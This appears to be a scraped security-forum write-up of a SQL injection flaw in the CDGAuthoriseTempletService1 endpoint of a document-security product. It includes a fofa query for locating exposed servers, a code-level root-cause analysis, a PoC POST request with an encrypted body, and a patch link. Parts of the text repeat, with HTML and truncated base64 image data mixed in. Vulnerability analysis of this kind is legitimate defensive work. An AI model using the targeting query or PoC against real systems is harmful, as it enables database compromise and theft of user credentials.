CGKFAICMPFGICCPHKFGGGBOMICMOKOBGPCBLKPCAHAGPFJHFABCPPKIOHIAIBJLLHJCODJMAGKBGIKDAFJHJMMKBDHABAJPBFNLBOIDFBHMMFKFHLPIAOPHEOAICJEMBCKFEIPGINHHBEGDOMEOPDKJGPNIJEDNOMEKLJHCGOJCEIPFPEDGBEHJLMNEEFIKFPGCCKCFCCOMONKACOEENLFIBAGNJBLHDEJCIPHOPDOAMGLINIEJDIFOLLGEDIDMDAKIPEINHHOFBOHLPEJBPJBKJLDDEIFOGLGHKANECEEGNDCNMJNLNJBFKNGKKJFODMFEKBOGFNDNJMCMHOFJBLGHEBALFGNNGLPBMKHHHGNKNHJGLFLODDIKAAOOOAJAEMBLBNMGOFJELPABKOEGMFLIBGPMHJPEJCKFBGHHNGMDAJBKBNNMIMFELPGEHDFGNHMBLEIKMINOAOAINBLEOIGHAMOPDNOIFFEFLGBFOFAGACH
四.漏洞复现
------
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-fd07a3312fc7250a784c5c4e3c0c963bbefbab38.png)
官网补丁
----
<https://update.nsfocus.com/update/downloads/id/159558>'>一.漏洞描述
------
某通文档xxx系统(简称CDG)是一款综合性的数据智能安全产品主要用于保护电子文档的安全某通文档xxx系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息。
资产测绘搜索语句
--------
fofa:
body="/CDGServer3/index.jsp"
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-94ff8d81f8d8dfa1291e4e5b7f8a11bb474854b0.png)
二.影响厂商产品
--------
某通文档xxx系统version&amp;lt;5.6.3.152.179受影响。
三.漏洞分析
------
漏洞点快速查找拿到源代码后根据某步平台给出路径CDGAuthoriseTempletService1查找相关类文件
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-d5d7a5e4f9adee6a228688514aaa778d76c17d63.png)
文件路径为:\\tomcat\\webapps\\CDGServer3\\WEB-INF\\lib\\jhiberest.jar!\\com\\esafenet\\servlet\\service\\document\\CDGAuthoriseTempletService1.class
首先分析下路由与鉴权
分析web.xml配置文件
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-539562c95e7f14bb76a9d1a9c97bfaa7e9114431.png)
在该漏洞版本的代码中,该/CDGAuthoriseTempletService1/接口路径未设置serssion效验
对比新版代码里的xml文件显而易见已增加效验
![520c4b79117734ab774e7de6479a8d5.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-a303d39f5c5bbfbf6a7cdfe42a4154534ae8c02f.png)
GetCDGAuthoriseTemplet gcat = (GetCDGAuthoriseTemplet)this.xStream.fromXML(toServerXML);
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-4e5ad1e5d3391586820b6e22a6d90c4a0b821c8e.png)
继续分析漏洞点,使用`XStream`库将名为`toServerXML`的XML字符串解析成`GetCDGAuthoriseTemplet`类型的Java对象并将这个对象赋值给名为`gcat`的变量
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-e57b9dac07b92f35819d6ce0bfd2ef44763252dd.png)
跟进代码发现调⽤validateInfo对其进⾏检查验证用户ID`userId`和密级ID`secretLevelId`的有效性进入else需要返回true才行所以我们要知道一个一定存在用户名默认系统用户为SystemAdmin
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-c6cb0c1f7aec76c094aa68c020aeb840a63c3080.png)
继续跟进发现调⽤ getAuthoriseTempletList 方法
,发现此处进行拼接查询
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-9a27a3265f2f27797b5e1057a4c263e59537a790.png)
userId固定注入参数为secretLevelId构造xml数据包
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-e073ff8052f213b2f82f5e3b338c6670a2634b5c.png)
需要利用工具加密
poc
POST /CDGServer3/CDGAuthoriseTempletService1 HTTP/1.1
Host: x
Content-Type: application/xml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
CGKFAICMPFGICCPHKFGGGBOMICMOKOBGPCBLKPCAHAGPFJHFABCPPKIOHIAIBJLLHJCODJMAGKBGIKDAFJHJMMKBDHABAJPBFNLBOIDFBHMMFKFHLPIAOPHEOAICJEMBCKFEIPGINHHBEGDOMEOPDKJGPNIJEDNOMEKLJHCGOJCEIPFPEDGBEHJLMNEEFIKFPGCCKCFCCOMONKACOEENLFIBAGNJBLHDEJCIPHOPDOAMGLINIEJDIFOLLGEDIDMDAKIPEINHHOFBOHLPEJBPJBKJLDDEIFOGLGHKANECEEGNDCNMJNLNJBFKNGKKJFODMFEKBOGFNDNJMCMHOFJBLGHEBALFGNNGLPBMKHHHGNKNHJGLFLODDIKAAOOOAJAEMBLBNMGOFJELPABKOEGMFLIBGPMHJPEJCKFBGHHNGMDAJBKBNNMIMFELPGEHDFGNHMBLEIKMINOAOAINBLEOIGHAMOPDNOIFFEFLGBFOFAGACH
四.漏洞复现
------
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-fd07a3312fc7250a784c5c4e3c0c963bbefbab38.png)
官网补丁
----
&lt;https://update.nsfocus.com/update/downloads/id/159558&gt;</textarea>
<div id=layer-photos-demo>
<div id=md_view><div class=markdown-body><h2 blockindex=0>一.漏洞描述</h2>
<p blockindex=1>某通文档xxx系统(简称CDG)是一款综合性的数据智能安全产品主要用于保护电子文档的安全某通文档xxx系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息。</p>
<h2 blockindex=2>资产测绘搜索语句</h2>
<p blockindex=3>fofa:<br>
body="/CDGServer3/index.jsp"</p>
<p blockindex=4><img src="data:image/png;base64,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
<h2 blockindex=5>二.影响厂商产品</h2>
<p blockindex=6>某通文档xxx系统version&lt;5.6.3.152.179受影响。</p>
<h2 blockindex=7>三.漏洞分析</h2>
<p blockindex=8>漏洞点快速查找拿到源代码后根据某步平台给出路径CDGAuthoriseTempletService1查找相关类文件</p>
<p blockindex=9><img src=data:image/png;base64,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
<p blockindex=10>文件路径为:\tomcat\webapps\CDGServer3\WEB-INF\lib\jhiberest.jar!\com\esafenet\servlet\service\document\CDGAuthoriseTempletService1.class</p>
<p blockindex=11>首先分析下路由与鉴权</p>
<p blockindex=12>分析web.xml配置文件</p>
<p blockindex=13><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABgMAAAOaCAYAAAC1HCLqAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdd1hc1534//fMAAMMMPSmoYoqhBrqkq1qS1axXBXX2E6xY6c7+02+SX67Sb7JJrubZDfFjuNUe927LdmyereFOkIgeu+doQ5M+/0BjBgYYEBIgP15PY+fx8w999xz59z56N5zzj1HsXrNOitCCCHE51xXu56enp6pLoYQQgghhBBCCCHEdaGc6gIIIYQQQgghhBBCCCGEEOL6ks4AIYQQQgghhBBCCCGEEOIzTjoDhBBCCCGEEEIIIYQQQojPOOkMEEIIIYQQQgghhBBCCCE+46QzQAghhBBCCCGEEEIIIYT4jHOZ6gIIIYQQQnyWKFTueAbPQ+2fgIu7LwAmQys9zfl01WdiNRumuIRCCDHzSawVQojRSZwUQjiiWL1mnXWqCyGEEEJMta52PT09PZOe71cWzyKvsZMTpa2TnreYZhRKfKJvQRu7BStWuluKMXXrAXDx0OLhF4sCBfriPbSVHgCrZYoLLIQQM5DEWiGEGJ3ESSHEKOTNACGEEOI68VarWBrhQ3X75HcyiOlF6epB0IIncfGOoKnoIG01F8Ey5MFKqcQnbCF+sZvxCEyhIeM5LMbuqSmwsHF1dcVsNmMZWl9iRpN6/WySWDtzyW9SiBtD4uTMJXFS3CjyZoAQQgjB9XkzYHmklq8snsXPj5RQ1jJ9brB1G5/i/tCzPPfyWTqmujAAaEh74ClWNLzJMwfKprow46dQErL4OyjUvtReeg2TQT9qchd3LaHz78fa00rdud85PRrLz8+PRYsWERwcjIeHBy0tLWRnZ1NQUIDVevV2Li0tjfj4eNvfRqORxsZGamtryc/Pt0s7WEBAAIsWLSIoKAh3d3eam5vJysqiqKhoxH3i4uJYvHgx6enplJaWOnUeztqwYQN6vZ5z585Nar5DPfroo7S1tfHuu+9OWp4BAQHccssto6YpLS0lPT190o55LSb7u/bx8WHx4sWEh4fj7u5Oa2srV65cITc394Y94F6Peh2gVCpZsmQJMTExk3Lt36hrfcaTWCuxdojPc6wduP6OHTtGTU3NiOm2bduGl5cXr7/++jUfE2DNmjX09PSM6zudjPOWOOkkiZMSJ4eQODn+62+q3Mg4p4qMjvnpdT+KEEIIMc0Ze3swm80T3j/Ey40IrTuNXUbbZ5viA/F1d+XNzFqSgjSolAo6eyd+jMkStHA7G8OqOZZeyvR4Z8Gd+HU7mG++yOHspgnn4qP1xS8gkI72NofbQ8N0KJQKeie508cn5lY8QtKoufCi3UOXQuWGu3YWau8wsFqwmPo6hCymHrqaCvCNWY8CKz2tRWMeIy4uju3bt6NSqSgpKaG8vBy1Ws3ixYvx8/OjuLjYljY+Pp6wsDCysrJoamrCYDDg6+vLggUL0Ol0VFRUYDQa7fJPTExk27ZtKBQKiouLqaiowMPDgyVLluDr62uX/2A33XQTYWFhuLm5kZ+fP5GvD19fXx577DHKysro6uqyfb5w4ULMZvOkP9A5Ul1dTVPTxK+9oZRKJQqFgqamJpqamtBoNAQGBpKZmWn7rKGhgdbW6TF92ES+65HqTavVsnPnTlQqFZcvX6asrAy1Ws2iRYvQaDQ3pD4HTHa9AgQHB7N9+3bCw8PRarWUl5fT2Nh4TXneyGt9JpNYK7F2qM9zrI2PjycmJgZXV1eKihxf22FhYaxcuRJPT0/OnDlzrcUHYN68eSiVyhGvVUcm4xqTOOkciZMSJ4f6vMfJ8V5/U+lGXmcjThOk9E1gQVAtF/L1oFBc94IIIYQQM9XCcB++vDic2o5efnG47wZVAcwJ1pBd14EVuCc1hFAvN/5+rpqL1Y4bq8W1cXF1JSV1Ea6ublSU2T8oRETFkpA0l4zzkzvqRenijjZ2C01FB+0eurxC5hCYuB2LuQdzbwduXiF01ufQkLMLq8WEyaCnpfgwAbO30FFxDItp5AXcPD09Wb9+PQUFBRw9etQ2sjozM5OcnBy2b99OZWUlV65cse1jMBi4cOGCXT5BQUFs2bKFNWvWsGfPHtvnGo2GtWvXkpeXx5EjR2yjZC5dukRcXBybNm2ipqaGy5cv2+Wn0WjQ6XRkZ2eTnJyMh4cH3d0TewNGpVKhmKL7zYyMjEnPs7Oz0+77d3V1JSAgYFidzHSO6m3+/PkYDAbeeecdWwdrTk4OVVVVrF+/njNnztg9qF0v16NelUol99xzD7m5uZw5c4ZHH3100o8hHJNYK7HWkc9zrB0QGxuLp6enw7iampp6vYsmphGJkxInHfm8x8nxXH+fJy7f+ebXHW/w8MFT1cbsPa/xdkYT1kFfqiUsmSWKUs5XdTnsKFAGJzPfrYyLFZ3SkSCEEGJaWxcGR0Z+u3pUSoWC7cmBbEsKori5i+dOV9m26bTuaN1dyK7vm4jnmVMVPLlsFk8t1/FhbgO7cxqxjPJqoirxTv7lXm8O/e5/OTcwl0/UJr778BJaDvyBF04PdChEcdt3Hyby/F94/ng9AK4haWzdupKkqBA8e5opvXyED/dfpH7IgHjPmHXcccdq4gNUtNUWceHABxzKa8NhqTSp3Pf12/FJ/yt/PV7fn8abxQ9/nVtcjvLnf6bTghdLH/kOy6pe5v2uFWxbnUioSxOFp/bw1pEqwm6+k1uXxhPpY6Y2+yBvv3uamkkcjNHc2ED25QukpC7CarFQWVEKgC4imoSkuWRfvkBTY/3kHRDwCJwLVmvffKz93LU6gufcTX3Oe3TUZgGgUnsRlno/gYm30ZCzG4C2mosExG7AI3AunbUjvw6alpaGyWTixIkTw6ZYqaioICcnh8jISLsHL0caGho4fvw4W7duJSwszDatQFpaGkajkRMnTgx7XbawsJCYmBiio6OHPXglJibS3d3NiRMniIuLIz4+nszMTLs0mzZtorW1ldOnT9s+02q1bN++nT179qDT6Vi0aBEAW7ZswWQy8fbbb2MwXH0QjY+PJzU1FV9fX5qamjhx4gTNzc12x/H392f58uUEBwfT09NDRUUF6enpmEwmu7I0NjZisViYO3cu9fX17Nu3b1gZFQoFaWlpJCQkoNFoaG1tJT09nYqKCofHDAkJwWg0UlxczNmzZyc0wmisvAbK3tPTQ2pqKkqlkitXrnDx4kXmz59PYmIiXl5elJaWcvz4cdt5D+zX1tbGkiVLcHd3p66ujlOnTg37DsdTpnnz5o1Yb1qtltbW1mFvWuXm5lJVVWU3HZuz5z24zrKysli3bh27d+9Gr7/a2OHj48Ptt9/O8ePHKS8vd3jtDT6eyWSitLSUM2fOOF0mq9XK7t27qaiowM3NbUL1O9JxB1MoFKSmpjJnzhy8vb0xGAzk5uZy7tw522/UmevU2Wt5JpBYK7FWYu3wequvr8fLy4s5c+YMm1bCw8OD2bNnU1xcTGxsrMNjjlaPAKGhoSxbtoyAgAA6Ozv59NNPJ/S9OkPi5LWTOClxUuKk43obaqTrz5m4Mrg8Y8XQ0c5jquOcy6v/+0+a9J0Ywzfy9KOxXPzLXzjWqBhaAvu/tYncdtcW1rYbcDTZgcrdG41rG7o3/8HuwpErQAghhJhqyglOFejhouSrS3XMC/XiRGkrr2TUYLJczSwlRIMVyKnvBKC128ivj5fx4IIwticFEeXrwV/PVNJtcjw3p7msgha/+5mXoObchb4bhLA5C4kKDEQ3Lwn302cwAITPYVGUK1nvNQCgCN/It7+zCbcrhzj0zmEMmhiW3fIQT89y51d/PoWt6UybxoMPmik7sYc3WlQEp65h09f+haC//ZLXsh38292ZxeGz6/n+ljtZkvE8Z9rAPWU7OxbBqd+epaXv6LhrAwkPvZvb6y6TvvdDtEmrWb/jyzweV42rMY9j+3K4HLmIdevv49G2Sn71cdXwY12D2upKgL4Ogf7PEufMI/vyBdu2yaT2T6CrpcRuYTa/mDW011y0PXQBmHs6qM16E3ffyKs7Wyx0tZSg9k
<p blockindex=14>在该漏洞版本的代码中,该/CDGAuthoriseTempletService1/接口路径未设置serssion效验</p>
<p blockindex=15>对比新版代码里的xml文件显而易见已增加效验<br>
